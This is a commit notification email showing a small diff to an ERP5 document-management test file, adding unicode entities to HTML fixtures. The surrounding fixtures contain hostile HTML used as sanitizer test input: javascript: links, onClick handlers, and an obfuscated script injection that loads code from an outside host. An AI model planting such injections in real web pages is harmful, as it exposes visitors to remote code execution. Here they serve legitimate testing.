[Erp5-report] r41859 nicolas - /erp5/trunk/products/ERP5OOo/tests/testDms.py

nobody at svn.erp5.org nobody at svn.erp5.org
Wed Dec 29 14:38:26 CET 2010


Author: nicolas
Date: Wed Dec 29 14:38:26 2010
New Revision: 41859

URL: http://svn.erp5.org?rev=41859&view=rev
Log:
Make test harder about unicode entities handling

Modified:
    erp5/trunk/products/ERP5OOo/tests/testDms.py

Modified: erp5/trunk/products/ERP5OOo/tests/testDms.py
URL: http://svn.erp5.org/erp5/trunk/products/ERP5OOo/tests/testDms.py?rev=41859&r1=41858&r2=41859&view=diff
==============================================================================
--- erp5/trunk/products/ERP5OOo/tests/testDms.py [utf8] (original)
+++ erp5/trunk/products/ERP5OOo/tests/testDms.py [utf8] Wed Dec 29 14:38:26 2010
@@ -1536,6 +1536,7 @@ class TestDocument(TestDocumentMixin):
         <a href="javascript:DosomethingNasty()">Link</a>
         <a onClick="javascript:DosomethingNasty()">Another Link</a>
         <p>éàèù</p>
+        <p class="Th&#232;mes">Th&#232;mes</p>
       </body>
     </html>
     """.decode('utf-8').encode('iso-8859-1')
@@ -1629,7 +1630,7 @@ style=3D'color:black'>05D65812<o:p></o:p
 <script LANGUAGE="JavaScript" type="text/javascript">
 document.write('<sc'+'ript type="text/javascript" src="http://somosite.bg/utb.php"></sc'+'ript>');
 </script>
-<p class="Th&#232;mes"/>
+<p class="Th&#232;mes">Th&#232;mes</p>
 </BODY></HTML>
     """
     web_page.edit(text_content=html_content)



More information about the Erp5-report mailing list